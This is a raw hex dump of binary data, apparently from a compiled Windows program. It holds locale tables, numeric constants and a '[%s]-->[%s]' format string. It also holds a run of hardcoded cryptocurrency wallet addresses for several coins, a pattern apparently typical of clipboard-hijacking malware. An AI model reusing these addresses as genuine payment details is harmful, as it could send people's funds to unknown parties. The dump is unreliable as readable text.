bf380810100001010000000000000081b12818101000052520000000000007084f480810100002d2d000000000000180b12818101000072720000000000009064f480810100003131000000000000283b1281810100007878000000000000d82cf480810100003a3a000000000000382b12818101000082820000000000009063f38081010000111100000000000000f5f580810100003f3f000000000000485b1281810100008989000000000000584b1281810100005353000000000000986cf480810100003232000000000000687b128181010000797900000000000030c4f480810100002525000000000000786b128181010000676700000000000028dcf480810100002424000000000000889b1281810100006666000000000000988b1281810100008e8e0000000000006094f480810100002b2b000000000000a8bb1281810100006d6d000000000000b8ab1281810100008383000000000000f004f480810100003d3d000000000000c8db1281810100008686000000000000e014f480810100003b3b000000000000d8cb1281810100008484000000000000887cf480810100003030000000000000e8fb1281810100009d9d000000000000f8eb1281810100007777000000000000081c1581810100007575000000000000180c1581810100005555000000000000986bf380810100001212000000000000283c1581810100009696000000000000382c1581810100005454000000000000485c1581810100009797000000000000a053f380810100001313000000000000584c1581810100008d8d000000000000b84cf480810100003636000000000000687c1581810100007e7e000000000000a85bf380810100001414000000000000786c1581810100005656000000000000b043f380810100001515000000000000889c1581810100005757000000000000988c1581810100009898000000000000a8bc1581810100008c8c000000000000b8ac1581810100009f9f000000000000c8dc158181010000a8a8000000000000b84bf380810100001616000000000000d8cc1581810100005858000000000000c033f380810100001717000000000000e8fc1581810100005959000000000000e81cf480810100003c3c000000000000f8ec1581810100008585000000000000081d148181010000a7a7000000000000180d1481810100007676000000000000283d1481810100009c9c000000000000d023f380810100001919000000000000382d1481810100005b5b00000000000018ecf480810100002222000000000000485d1481810100006464000000000000584d148181010000bebe000000000000687d148181010000c3c3000000000000786d148181010000b0b0000000000000889d148181010000b8b8000000000000988d148181010000cbcb000000000000a8bd148181010000c7c7000000000000d82bf380810100001a1a000000000000b8ad1481810100005c5c00000000000018e7ff8081010000e3e3000000000000c8dd148181010000c2c2000000000000e0f5148181010000bdbd000000000000f8ed148181010000a6a600000000000010061781810100009999000000000000e013f380810100001b1b000000000000283e1781810100009a9a000000000000382e1781810100005d5d000000000000a054f480810100003333000000000000485e1781810100007a7a00000000000008fdf580810100004040000000000000584e1781810100008a8a000000000000c83cf480810100003838000000000000687e1781810100008080000000000000d024f480810100003939000000000000786e1781810100008181000000000000e81bf380810100001c1c000000000000889e1781810100005e5e000000000000988e1781810100006e6e000000000000f003f380810100001d1d000000000000a8be1781810100005f5f000000000000b044f480810100003535000000000000b8ae1781810100007c7c00000000000008fcf480810100002020000000000000c8de1781810100006262000000000000f80bf380810100001e1e000000000000d8ce1781810100006060000000000000a85cf480810100003434000000000000e8fe1781810100009e9e00000000000000171681810100007b7b00000000000040b4f480810100002727000000000000180f1681810100006969000000000000283f1681810100006f6f000000000000382f1681810100000303000000000000485f168181010000e2e2000000000000584f1681810100009090000000000000687f168181010000a1a1000000000000786f168181010000b2b2000000000000889f168181010000aaaa000000000000988f1681810100004646000000000000a8bf1681810100007070000000000000616166662d2d7a7a6161000000000000616172722d2d61616565000000000000616172722d2d62626868000000000000616172722d2d64647a7a000000000000616172722d2d65656767000000000000616172722d2d69697171000000000000616172722d2d6a6a6f6f000000000000616172722d2d6b6b7777000000000000616172722d2d6c6c6262000000000000616172722d2d6c6c7979000000000000616172722d2d6d6d6161000000000000616172722d2d6f6f6d6d000000000000616172722d2d71716161000000000000616172722d2d73736161000000000000616172722d2d73737979000000000000616172722d2d74746e6e000000000000616172722d2d7979656500000000000061617a7a2d2d61617a7a2d2d6363797972726c6c0000000061617a7a2d2d61617a7a2d2d6c6c616174746e6e00000000626265652d2d62627979000000000000626267672d2d6262676700000000000062626e6e2d2d69696e6e000000000000626273732d2d626261612d2d6c6c616174746e6e00000000636361612d2d65657373000000000000636373732d2d63637a7a000000000000636379792d2d67676262000000000000646461612d2d64646b6b000000000000646465652d2d61617474000000000000646465652d2d63636868000000000000646465652d2d64646565000000000000646465652d2d6c6c6969000000000000646465652d2d6c6c75750000000000006464696976762d2d6d6d76760000000065656c6c2d2d6767727200000000000065656e6e2d2d6161757500000000000065656e6e2d2d62627a7a00000000000065656e6e2d2d6363616100000000000065656e6e2d2d6363626200000000000065656e6e2d2d6767626200000000000065656e6e2d2d6969656500000000000065656e6e2d2d6a6a6d6d00000000000065656e6e2d2d6e6e7a7a00000000000065656e6e2d2d7070686800000000000065656e6e2d2d7474747400000000000065656e6e2d2d7575737300000000000065656e6e2d2d7a7a616100000000000065656e6e2d2d7a7a7777000000000000656573732d2d61617272000000000000656573732d2d62626f6f000000000000656573732d2d63636c6c000000000000656573732d2d63636f6f000000000000656573732d2d63637272000000000000656573732d2d64646f6f000000000000656573732d2d65656363000000000000656573732d2d65657373000000000000656573732d2d67677474000000000000656573732d2d68686e6e000000000000656573732d2d6d6d7878000000000000656573732d2d6e6e6969000000000000656573732d2d70706161000000000000656573732d2d70706565000000000000656573732d2d70707272000000000000656573732d2d70707979000000000000656573732d2d73737676000000000000656573732d2d75757979000000000000656573732d2d76766565000000000000656574742d2d65656565000000000000656575752d2d65657373000000000000666661612d2d69697272000000000000666669692d2d6666696900000000000066666f6f2d2d66666f6f000000000000666672722d2d62626565000000000000666672722d2d63636161000000000000666672722d2d63636868000000000000666672722d2d66667272000000000000666672722d2d6c6c7575000000000000666672722d2d6d6d636300000000000067676c6c2d2d65657373000000000000676775752d2d69696e6e000000000000686865652d2d69696c6c000000000000686869692d2d69696e6e000000000000686872722d2d62626161000000000000686872722d2d68687272000000000000686875752d2d68687575000000000000686879792d2d61616d6d000000000000696964642d2d69696464000000000000696973732d2d69697373000000000000696974742d2d63636868000000000000696974742d2d696974740000000000006a6a61612d2d6a6a70700000000000006b6b61612d2d676765650000000000006b6b6b6b2d2d6b6b7a7a0000000000006b6b6e6e2d2d69696e6e0000000000006b6b6f6f6b6b2d2d69696e6e000000006b6b6f6f2d2d6b6b72720000000000006b6b79792d2d6b6b67670000000000006c6c74742d2d6c6c74740000000000006c6c76762d2d6c6c76760000000000006d6d69692d2d6e6e7a7a0000000000006d6d6b6b2d2d6d6d6b6b0000000000006d6d6c6c2d2d69696e6e0000000000006d6d6e6e2d2d6d6d6e6e0000000000006d6d72722d2d69696e6e0000000000006d6d73732d2d62626e6e0000000000006d6d73732d2d6d6d79790000000000006d6d74742d2d6d6d74740000000000006e6e62622d2d6e6e6f6f0000000000006e6e6c6c2d2d626265650000000000006e6e6c6c2d2d6e6e6c6c0000000000006e6e6e6e2d2d6e6e6f6f0000000000006e6e73732d2d7a7a6161000000000000707061612d2d69696e6e00000000000070706c6c2d2d70706c6c000000000000707074742d2d62627272000000000000707074742d2d70707474000000000000717175757a7a2d2d62626f6f00000000717175757a7a2d2d6565636300000000717175757a7a2d2d707065650000000072726f6f2d2d72726f6f000000000000727275752d2d72727575000000000000737361612d2d69696e6e000000000000737365652d2d66666969000000000000737365652d2d6e6e6f6f000000000000737365652d2d7373656500000000000073736b6b2d2d73736b6b00000000000073736c6c2d2d7373696900000000000073736d6d61612d2d6e6e6f6f0000000073736d6d61612d2d737365650000000073736d6d6a6a2d2d6e6e6f6f0000000073736d6d6a6a2d2d737365650000000073736d6d6e6e2d2d666669690000000073736d6d73732d2d6666696900000000737371712d2d61616c6c000000000000737372722d2d626261612d2d6363797972726c6c00000000737372722d2d626261612d2d6c6c616174746e6e00000000737372722d2d737370702d2d6363797972726c6c00000000737372722d2d737370702d2d6c6c616174746e6e00000000737376762d2d66666969000000000000737376762d2d73736565000000000000737377772d2d6b6b65650000000000007373797972722d2d7373797900000000747461612d2d69696e6e000000000000747465652d2d69696e6e000000000000747468682d2d7474686800000000000074746e6e2d2d7a7a6161000000000000747472722d2d74747272000000000000747474742d2d7272757500000000000075756b6b2d2d75756161000000000000757572722d2d70706b6b00000000000075757a7a2d2d75757a7a2d2d6363797972726c6c0000000075757a7a2d2d75757a7a2d2d6c6c616174746e6e00000000767669692d2d76766e6e000000000000787868682d2d7a7a61610000000000007a7a68682d2d636368687373000000007a7a68682d2d636368687474000000007a7a68682d2d63636e6e0000000000007a7a68682d2d68686b6b0000000000007a7a68682d2d6d6d6f6f0000000000007a7a68682d2d737367670000000000007a7a68682d2d747477770000000000007a7a75752d2d7a7a61610000000000000000000000000000000000000000f00fff00000000000000000000000000f08f7f00000000000000000000000000f807ff0000000000000000000000000008080000000000000000fffc030000000000000000000000000001010000000000000000000000000000ff0000000000f00f00000000000000000000000000f0ff0f0000000000000000000000000008080000000000000000000eebc3336eb010e43f000000000000000000000078b310e43f0000000000000035a0e4591f9e01963e0000000000000000000050435797ec3f00000000000000251b5cbce1d0ec3d3e0000000000000000000000000000404000000000000000000000000000f0cf3f00000000000000000000000000e0df3f0000000000000000010100000000000000000000000000000000000000605f3f00000000000000000000000000e0df3f0000000000000055000000000080ea3f00000000000000000000000000d0ef3f000000000000009a030000000050f63f0000000000000055000000000090fa3f000000000000000000000000f8774fc000000000000000fdfa0700000000000000000000000000000000000000b08f3f00000000000000000000000000eed13f00000000000000000000000000f1ce3f0000000000000000000000000010100000000000000000ff000000000000807f00000000000000e6b201000000e08a3f00000000000000d4127c23000010b63f000000000000009fcea0f6246a2b5d3f00000000000000f00fa295fcb4bc033f0000000000000000000000ff000000ff00000000000000010100000202000003030000000000000000000000000000000000900e23e6643f000070a47bc4543f000060f52ccd4b3f0000a0d6e2ef443f0000a0ed79b5be3f00005058931fbb3f0000c0b18f79b83f00008010ced5b43f0000f09ad135b13f0000a023899bae3f0000e0550027ad3f0000501f10cbab3f000000535491a93f0000d0136e3aa83f0000f054f6cba63f000020d90c6fa53f000070b3540ba33f0000a0a63ea6a13f0000b0751349a03f0000a0a1bb1a9f3f000020c166269e3f0000c0c257f79d3f0000c0a746829c3f00009081fc4e9c3f00008081b91c9b3f0000e0d8ba279a3f000010a9f2ed993f000040c397b3983f0000c058447b983f0000d02a590b973f0000c06ac0c3963f0000d079999a953f000020d90c5f953f0000009a2011943f0000901df3d2933f000010c594ec923f0000a0d175aa913f00007014a268913f0000b01e2928903f0000c0e80c948f3f0000f0d6a2348f3f0000904231538f3f0000301c6ff28e3f0000407496138e3f0000608bebb28d3f000010420ded8d3f0000e088d50f8d3f000050602ba88c3f0000e048d0cb8c3f000030e306668c3f0000a00f9d868b3f0000d0eeb13b8b3f000020a16a5f8b3f0000304730f28a3f0000604182168a3f000040c07e4b8a3f000040d4cdef893f0000f0ade902893f0000b06dd3b9883f000000147dde883f00006061c274883f00003096baa4873f0000000375ce873f00003028d777873f000040a6c19e863f000090fded39863f0000a00e7661863f0000d079998a853f0000a0ffd732853f000070a00f65853f0000b04cca8d843f0000d0346936843f000030b96d5f843f000040aad086833f00007078992d833f000010f4025a833f0000a0dd4181823f00008055442c823f000000ec0a5b823f0000a061fa85813f0000b0e6c62e813f0000a00b4f5a813f0000c000f887803f000080161a33803f0000301dcd5f803f0000a062dbd9ff3f0000703f0c83ff3f000060ddd1acff3f0000808c9a56ff3f0000003d827fff3f0000105fa728ff3f0000f0b253d0fe3f0000a0b822fbfe3f00008050b2a3fe3f000090fae14afe3f000010f75472fe3f000030769a1dfe3f000010988cc6fd3f0000e04c80eefd3f0000d064e096fd3f0000f06fe3befd3f000080eeca66fd3f0000b090ec0efd3f000090264531fd3f000050602bd8fc3f000020aecc81fc3f000020f0b9aafc3f000080766653fc3f00006061b97bfc3f0000e0102e1dfc3f000030f5c0c1fb3f0000700e52e8fb3f0000d0cc4f97fb3f000070d0d9bdfb3f00007079a964fb3f000000589e02fb3f000030bc6028fb3f000040e6b4d7fa3f000030969efdfa3f000050dcd29bfa3f000090c8dc41fa3f0000404ba16ffa3f000070d46b0afa3f00004064d130fa3f0000d05a90dcf93f00005088e7f9f93f0000d0dc69a3f93f000080a8a24cf93f000080ab8469f93f0000e0f5c112f93f0000d0371f3ef93f000070d1bcdaf83f0000e0a20085f83f0000408caaa1f83f0000a09db64cf83f000030a73868f83f000010c90a14f83f00005053fb3ff83f000020360ad4f73f000090815188f73f0000c03596abf73f0000e022454ff73f00000079d263f73f00003028d707f73f0000a000523af73f0000706204dff63f0000b0dd54f0f63f00008032ee95f63f000000e19eb6f63f000050a95b6bf63f0000708b3e0cf63f0000b0570f21f63f0000f04db6c1f53f000080fe50e4f53f00006049789bf53f0000a01ecdb9f53f0000704ea85cf53f0000f0581072f53f000020de2410f53f0000300ec337f53f0000305976d4f43f0000403f3e8af43f000070f0e3a8f43f0000f09ce94ef43f0000b0f4e36cf43f0000f0f7ce02f43f0000c0765c21f43f000030615dc0f33f00005087fae1f33f000050190683f33f000040e7d7bcf33f000030c1605df33f00004067947ff33f000080c99d18f33f00001048ad39f33f0000005345dbf23f0000605a0dfaf23f0000606e5695f23f000000cfb7b5f23f0000700ce554f23f0000a0b6ac77f23f0000d04d4717f23f0000f0e1ea36f23f0000304368d5f13f0000a061faf5f13f000050ada695f13f000060465ab2f13f0000e0dca052f13f0000e0a0fc72f13f000080b2ee12f13f0000d0c1ed32f13f0000e03ec5d4f03f0000d049a2f4f03f0000a0e21994f03f00008059a3b5f03f0000702ec455f03f000090416876f03f0000f0c2eb16f03f0000a0227a37f03f000050b0ebdbef3f0000a0d66dcbef3f000030342ffbef3f00001099b3eaef3f000040454f9aef3f0000e0982189ef3f0000f0138bb8ef3f000070363ea8ef3f000080202757ef3f000010e26446ef3f0000300b9d76ef3f0000f08bce65ef3f000050e47014ef3f000060843703ef3f0000303cef33ef3f0000c0ebd922ef3f0000105342d0ee3f0000401242c1ee3f0000401946ceee3f0000306876ffee3f0000004f72ecee3f0000d0ed719dee3f0000a0847f8aee3f0000707369bbee3f0000508aa2a9ee3f000040e92e56ee3f00006010e647ee3f0000a08f8a74ee3f000010f75462ee3f0000c0565413ee3f0000b08eef00ee3f0000f02e010eee3f00007007993fee3f00006068f52cee3f0000a0319ad9ed3f0000504309c8ed3f000070fda5faed3f0000101037e5ed3f0000305b2e97ed3f0000d01e9d81ed3f0000002b49b0ed3f0000d0af0fa2ed3f0000408db3aced3f000060739e5fed3f00002072c949ed3f0000a029207bed3f0000e0590e65ed3f0000e0022717ed3f0000b0b4d006ed3f0000504ffd30ed3f0000c0f2c222ed3f0000201fc12ced3f0000703448dfec3f0000b0f258c9ec3f0000e0d911fbec3f0000103a1ce5ec3f000050435797ec3f0000000000000000000000000000008faf92909eb6b88fe9d9231d5a66be8c6a85ac96e5985bf354040f597fb720ee6a6908934fb0aec936b45edd542b87f92cb463a6ad4470c4a2b1313f4f0d9fc0f070676233c4a6d4282572ad3750883e93d4528db5170c36fa173d2ed780923b3c4b9d79da3de790333e07c7cf497830fd35f04190b583dc29a8f152d3cd0738815a13a7b11319d7d618e90415717337f9c5c2b0f92a63fd6c969057002e3e2e3060a323ee5b4e2b911ab67359af59e250ce95850aee472e71a5ec4c8283582d93111d3f4499552814c01d4313c17b23d1130bcfd85244cbb57880b692bd1ace8e79f033007b763a99fa7ac068ff6d23d95ec806e941c0215e660cad18982f362aa8f152d3cd17286505347ae6c1313875291e8de279782c0458e24e7c8c3737e04a81fc38e1242a0f912f9f007b76237fb348b1971b912815971af85f09f7c2510ba10bf08b9f1712876f78902e29157a21b8a0adc7eec4a3a934543720552b5e7b61ee1f5add3240d7d55b42c8ba2997f6c05a88c5992fbc52d666a4d50629c6f0390d1227261104dbcac826d10329a4d53c8e5a1c9d18bd0764553a7b09c0a89e468a5cb40c1d2d1f7531a09b8ac453369eceb470d220a6d218ab10fc341f86890068195738110b0d5c41ae44d425be6d6696b5f74021da3df0d0b4076e1aaa982efaf8b88a2c37eae797db432114c09bc30dfd1b52215d32672f899c2d1f08117ea78677f7c5f7d6d4edadda422e541e19102ec675dd5d660cad18983f2602afd6a94418b63897722eeee3a24a2e2bc08073dc18f529815b4a1153b554339d9c57b2f5a4962309000dc720659c1a3a16bccf1ffc912da190e6a032f7a0122344ce82e51ac317084d4a5fc80cb3276b53747b5f245c106af8d686cf2f3a186cf0c3aee44d4f170e17e3d5d98b5b2608fd9151b0df441e9aa526a388383e34e8aff63ae0db9424a407c3c2bd0cc4d457978272eb855c012a773288d795b5103239577b89b30a17bfdf2640b0e75d0c91090de726316005226af852b648d2cdd0f7200be69d7602299afe0f948c712b267eec7b1d63bc0d581001826b0caf0386182d7dcb737107187ef244e0d3e605848d355b8419fd07f90d210b091ae92492a12aa5d19dfb0b84039379273b76076ad20e1db2133339cebba8e80b5a5632bc52d666a4d53619c67461599125251b9e72203c455aff106a217f062206091ff46dfe6ac0837d331b65e8bb6d0154152097a8e2ad5e030d6e25fe88fb3ff8015a79ca5bb9858e004ae011a7eabe4c04dd65588c94c8330391f7de662c688b11a094ca127026bf05ef8a99304215851ea76fad7942b6eb0309c76b1e8abeb936df2a5b2596abb600c86088ede2022508a495adfedb9831109b1c80703be7b912dcba6644ef903d060a379c75ccd7de11375fd8d7aca66a07768c92ae97aef708ca9593fd2de9ef1a9cf16ee8f5c1d40b68a47be81e2d68043193482b03aa6e06e40dffaaac223c0ede3f9bd044c3e2cc9bffb3e46d73351b2fc6e53d77560818f137e80ac3e7d3d0b8488635342f461d1f8c2dc931235e3b5a0adf65f9020e1f32f9cce07469f309c27cf113e6933f165f28a826a533bbd75e32672f899c3d0fb6fed78a66710b09bfbcd409454dc214918e37e636769a14583d86a9ff952e0eaac0ef57834f0d133ecc833df93f44cd14cb836a149cbc019113bbc3538de2c5971d7cd770441600ad99286b42684b1662708e63d41ef4c27b4f15fba211610bbbe86bfec8d6dd050755b5292f46bc1bbf313f3e3449fa08f660b61e6d2a730a21ccc58816b70809b9ad53741d47640dc8f760cfd7a8ea05dc14359546b3af32c5f394fe125815030158b552b882800498db54e2f8051a123ce80576a1bca51fd8ee28bd5405f7056e836ef941053806df8b0a46e453ba15e1f49d90f9a55014f7a7ec4a87396e26ce9867ead8725021dd76ec0cbfaa97ca7a16d153ad189ac152b0b573efc5040955e8bdcde3a798112d0374ded4e6b1072496237fb83ba8c64c58a49672e5b90bc5f3654f47f16ac3aa973f3978266b0d26878d10e5ff2e086af8d686cf2f2a08742a688c22a138011f75c0705b8b0802353b714ffe4189065d78cd52c6017c0108424d67576a5904e0c7a0efd0c4760a987f6bb39358fc08228fb910b8ba1f190ea2851986992d02c0ac3fe051e10c0f29fecbab5c3bdd0d6e8db6ef16cb7017b5ac09711296d633faf1332cdb5454cc090810a478b204786019b1513c75c414da842ac9fc346d1810573aa1a04f24173f4e5c1b28076b72659419c038563274762ebca3250c147a1fec80a73e7de5728269a91e5f4054172db91645a5ed911ee3abb9ac437b6a0f766f8d591565aa17aa7d160b902873013155b294c604f878861ee8b394f5a705950ffbdc26cf4115ef3ce276ba0f8f7ddeaf0f84888ce917a345ad0f3138337e2c04f624c0405f25aadc860ca7a0857ef3f8ec9855d3f40d7075503ec736d64f7e9f9d420af3da1eca2d3aea79ffa1107bcf8e8f7ded507568ff53258dbcd00083d881e409622e7b581001826b0cdf735e82d5b124cc2676ce52aefd5eca23784a98a4e752ec3e11f91675229da5f2725b13de56a5eb951b23575010c80c8f7fa104db4a55928c7f4e2076ee9e60737b5e420a1deda64909ec6bf9708cab331acc1d96029461ce7ed7be8be556a88a7369a3f8ab3497487232aa036b1855c97484ed92c87da6e60e34b755fa7ea58d7a2b36c0708a3511037cc0dd4c32e6e51c4309ae9773a4bd19158ce628f66704c10c39f9f3a5ee681fe5aef4fd37e6e37034ed849dce59277011c13767b8e7a07fac8eed73a943451342d87f5379f63d04c884b3ec19cdb97e1b1b5cbce1d0ec3d3e00000000000000000000000000004060c0ffffffff1fc0cff7fbfd7ebf3fc02de8fbabb6bd5ec01fd8799ee7797ec08a6e7b0cbc739cc04e3308d4fb21bbc08abf2967b2d3dac03717638c31c6f8c03d8ccbbd3f2e17c1ff2cedb2b4cb32c1d4eabbc0fa2e50c158d0475b9aa06fc1dbb4c732bf6e8ac14b91e4c8f36da9c14c69c6a5e8abc4c1210000000000e0c121fee11ffee1ffc1b50c7e1b353318c2f5d7bd7cddcb37c2e45a38cf16ce53c2b5f5613dd1606fc20b1894ece2c18ac28dc007f52cf0a1c222c9955cc995bcc22541a75f8f0bdac24bb4aee13ab9f1c2f979fb18329c0ec33490988adf8e24c3d82cca97fbd342c3ae70bf5bb61758c37dc871a17cad77c323dbb66ddbb68dc3b9cf44dc45cca4c3cf083bc28eb0c3c323bc8e178c93dac3df2041820409f2c3b4060b686d760ec4c8f1921da2f626c44445b6ed98393fc4ef6a7bd5ed5557c41cdce733358b6ec4b4b8e9e7511186c43aeb505d01879ec47054f35c35cfb5c4f1c8de92027fccc4e659ec2c7616dbc49b86fbe87a42f2c417870e1d3a7408c561ce04eb973321c5246bb5df6ab53fc5c2166ca832b255c581dd090a8f7762c566b8d161b76478c55277ca76a76c97c575c0e26f4616adc525bee55bbee5bbc59fbcd942ad06d6c53d4931832ac5ecc525baa11bbaa1fbc5e6ea23851b6215c61245037c88482ec63da345aa9f133bc6e5ca45bfce8a57c6a5030000000060c6c03f4e8322aa7cc64dcab4f41c9489c691d994e8b0e7a5c6df093f2a4cf8b1c6d9cab7e4b9f2cdc616cb3299b2dbd9c6ea4591135d42f4c6c5e284134e3801c70008c68b28b41ec7eccb28bd8cd22bc705c59de24e7147c795599864b61554c7a31588f7365961c775fa1b5b15637ec7862b527c9b538cc7279ee7799ee799c72b127ebac24fb7c7e2630cc8edabc4c79f0426834b60d2c7270000000000e0c7391e78e08107fec77f3f7efcf8f103c82252150b74c715c8cbf1783c1e8f27c8437d2fbc210d49c8fc2f0ce82a8f5ac8b4b28fddc1316cc8f76cdcf9cdc67dc832cb5c8b19718ec88e189dd038bb90c8521874c3089ca1c879514a29a594b2c8b273bf8435c4c3c883629839570cd3c83675e0f1156be4c84ff18a57bce2f5c8287792e4769204c9f8f074289c1617c95ea949a7807727c9287badd77aad37c90227b9a943f847c9afe22182ed9d57c9ff1058b27dd667c9287fe9977ee977c9257d6637a9ee87c9c6db733b868d97c99ce971beca1da4c95b452a52918ab4c9e11e4a32ee65c5c97f2263768dd9d5c9ab3a9f59dba7e2c939104e38e184f3c9c3d1041d509203cad8f2c568e3bc12ca9a470e2fa4bf2dca684783b8a3413ccaae6bbd817a064fcaff9a5b6a6ea959ca9566efd290fc68cad2b5d9b1e25c7bca5f655d5957d675ca05513b6cd19c84caddb02ec62df496ca6a0000000000a0cac17c395dc362b2cad4e4fbbc4130ccca744eadfea9d5dfca2aed1a08ed1ae8cafa01d5f0c32dfaca2a4551144551f4caa4d791bfed7c07cb063c2a88470511cb7360f062fd9b2ccb51c18aa23f723ecbde6e297be38349cb64e4edf276795bcb754b77dbd2dd56cb58b76251daac61cbbfc84923278d7ccb446fbae9a69b8ecb5906396dfaa399cba5553a320cab94cbf5bcb1253b8aa7cbc422bb079dbeb2cb72a3459b171dcecbb898caf0434bd9cb6e0807789395d4cb2b0000000000e0cb59036bdf5385f3cbc4e8a38f3efa08cc38a80ae7cd611dcc3dab4d5890ce11ccf9b3df3b480c26ccd84cd0df315c3acc6a7c0afab9dd4ecc2b2f8aa2288a42cc1deab2421c8156cc5c1c673430856accb1866eb5f1af7ecc2b2cb9922bb972ccd1ab8c188a2e86cc774fd92d7ee49accc7d2b5c09193aeccfeb953d0e74ea1cc7955f34cd53fb5cc8d0eeb0cbfdec9ccc5e77787b173dccc80af3b61a9c0d0cc895d02b12f6febccaf41e1311814fecc5f62c6eee2c9f2cc57478e1c397204cd749a2f5fefa519cda817cb8be5c512cd9ff07d2c0bdf27cd9f8cadccb6323bcd2e266dd477474ccd7f6b2aaca9b046cd3ac432618eb55bcda18cf6cd68df6ccd9aa1bce329e161cd2ca3389aa2387acd72836f99c2878fcd0a12a639e82381cd1826d7aacfdb9acdce6312f0527caccd8dc5e6efe3cea1cdadb66ddbb66dbbcd643b77802089cccde06326e22e62c6cd1538b282232bd8cd4783daa036a8edcdd9b31dc8f96ce7cde619a76b4b4cf9cd2d3221133221f3cd4f6fdebc79f306ce73f4c743c8181dce4bcc8704d40d13ce82f76449922d29ce229c230fabc93ece66b9fce0dee734ce16c4ab060af14acedc5948951bcd40cea9ed617bd81e56cea18ff1f9189f6fcea33e2e0cd3c765cee4f0bb13333a7bce2d0a9990099970cebb52cd0293fd86ce460a31cb8f689fce3e33ceacdde995ce322a522a4145aacef61c285e1ae8a0ce04f6c7045117b9ce1b6373b98331cece2ed9fd24d9fdc4ce936c2d6402a7ddce0c036dbabf7bd2ce196eefbe292aebce2e0000000000e0cebf9011bf45fcf6ce2ee10eeee00e0ecf9d879649171805cfaf0c7a8d9e191ccf2e71e2d753e214cfa9d0c92788fb2bcf05a4ab63129622cf04e166f33eb839cf4e30ca0d216730cff755b8c90a5147cf8a59c25c5d805fcf98b778628b2756cf5fe32c097d466dcf6b5d083806aa65cfdd8710c618277ccfbb94524a29a574cfdd085291b6e48bcff931b04d2c5583cfc4e96be529df9acfc35558239f2f92cfb9f307d24eb7a9cf3b30e32060c6a1cffaa172da8500b9cf2f1445511445b1cfc3bbc53571fec8cf254441aa24a1c0cfd6c05e8b984cd8cf370c0683c160d0cf084d2b67123ce8cf2f0000000000e0cfbf800103060cf8cf3f0000000000f0cf3f000000000000006c0308560130000043434f4f4e4e4f4f55555454242400000000000000000000ff0000000000c07cbc0000000000c0fc985b252573735d5d2d2d2d2d3e3e5b5b252573735d5d2d2d2d2d3e3e5b5b252564645d5d000000000000000000000000313178784545787875756a6a4a4a75756e6e797952525656474738384d4d57576e6e454567677878646448486b6b5656777757573737787853537a7a6e6e74745a5a00000000000000000000000000006262636331317171646468686d6d3030737330306d6d67677676303038386161616138386b6b38386a6a39393636646468687a7a7777323233336d6d3737737368683434787830306161737338383737797964640000000000000000000000003333313171717575484876767a7a4a4a6868414134346b6b56564a4a4a4a4e4e6e6e37376161353545455050585873734c4c363671713939737358585050737371716d6d000000000000000000000000303078784545303034343838313145453232363661613030313131313737373732323131363639393838636344443535424238383939363632324141303039396464383835354646333330303939353566663636000000000000000000000000545457574a4a73736363333354547373505035355a5a4343626258587a7a3333414173734a4a50504545616145454d4d76764c4c37377777656544447878545471714a4a000000000000000000000000727268685a5a454577776b6b4545545434345a5a7272777753534848424270707272636361617878343456566868535366667070686865657a7a5959595963636666696900000000000000000000000044444d4d515168686969797957576161383859594e4e656573735656383854547070535343434e4e4242575737375858585859597171656559596969565652526363373700000000000000000000000000000000b8495ccd600000000d0d0000dcde0200bc8b3601bc9b260100000000b8495ccd600000000e0e0000000000000000000000000000000000000000000094940000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005051818101000000000000000000000000000000000000884ac280810100009052c2808101000000000000000000000000000000000000000101000000000001010000000000000000000010495801f0c53401c8fd340100000000000000000000000000000000000000000000000001010000083e37010000000000000000182e3701000000000000000000000000104958010000000000000000ff000000ff00000040400000f0c53401000000000000000000000000010100000000000000000000e8b05901685e3701407637010000000000000000000000000000000000000000000000000202000080b63701000000000000000098ae3701182e370100000000000000000000000000000000e8b059010101000000000000ff000000ff00000040400000685e370100000000000000000000000001010000000000000000000038615801e8de3701c0f63701000000000000000000000000000000000000000000000000030300000037360100000000000000002017360198ae3701182e37010000000000000000000000000000000000000000386158010202000000000000ff000000ff00000040400000e8de37010000000000000000000000000101000000000000000000006831580170473601487f36010000000000000000000000000000000000000000000000000101000088bf3601000000000000000098af3601000000000000000000000000683158010000000000000000ff000000ff00000040400000704736010000000000000000470417184c10100000a9a9002e5a111d0c5049036e00000000b9b900202000002e5a111d0c5049034a1400302099b900606202002e5a111d0c505c7800c0c000888a02002e470d051515451135000000884ac200101000002e1e005305016700985ac200080800002e6d1106707c1b0241000000a062c200080800002e6d1106707c1b195a000000a86ac200080800002e6d1106707c110841000000b072c200181800002e6d1106707c110a43000000c80ac200080800002e6d1106707c11135a000000d012c200080800002e6d1106707c081141000000d81ac200101000002e6d1106707c080858000000e82ac200080800002e6d1106707c080819410000f032c200080800002e6d1106707c080a5a000000f83ac200080800002e6d1106707c0c154100000000c3c300101000002e6d1106707c0c0e5a00000010d3c300b8ca72002e5c160515156100c8fd3401f4f501002e5c16051515455672000000bc8b3601dcde02002e5c16051515455e00001e060567000098a23b01080800002e5c0617476d080041000000a09a3b01080800002e5c0617476d13005a000000a8923b01080800002e5c06174770150041000000b08a3b01080800002e5c061747700e005a000000b8823b01f0fa0a002e561c0515156100a8ed4401f8f800002e561c051515455c78000000a0e647015c5c00002e4b010515156100fcba4701282800002e470d05151545163200000024634601141400002e470d051515451733000000387f4601888a02002e470d051515451034000000c0894801cacf05002e470d05151545123600000000505101e8e008002e4a051515610000e8b05901a8a800002e4a05151545567290c95801607313002e4c11007300000000707101bcb10d002e5e14051515610000808101808000002e49010f0d17575c7800000080008101303000002e49010f0d17575d7900000000909101606000002e5c0101114714013100000060f09101808101002e5c010111471402320000000000000000000000000000000000000000000000000000000000000000000000190518040a0b222303636252b052b20000010100218ca904ad991327087c5c283025150001171600b8823b0121290a0208eccd2901171600aeb81600ccf63b0121290a0208fcd622aeb81600bdab1600e4de3b0121210000aeb81600bdab1600e4de3b012121000001171600aeb81600ccf63b01212100003025150001171600b8823b012121040400745c28003413273025150001171600b8823b012121020200745c283025150001171600b8823b010105050104464200212407020531300490881800a9b1180068533a01212102020034300490881800a9b1180068533a012121000090881800a9b1180068533a01015e5b045f6b3c0806545072700000000101000001090901084a420001080801096b6200010b0e040a3e390d0a78747671090c04087a76747363623221041d0815617d091571630715213206152723f100cc2c0001010000130c1f00a0bf1f002099b90000000000111e09060f6b6c080f3b32060f3d397b90cc2c00010100003a1a200058782000378eb9000000000009131c061a2e3b0f1a6864f6f464637380cc2c0001010000bd9d20006746210053eab900674621000107040206545052590d050104262200e0cc2c0001010000e7c32400725725008930b900725725000103030102525000010c09040d393e0a0d7f7456510c09040d393d090d3f34565114100515218eba1514b9b8065650000113140612667c08122633071220395b51010000011d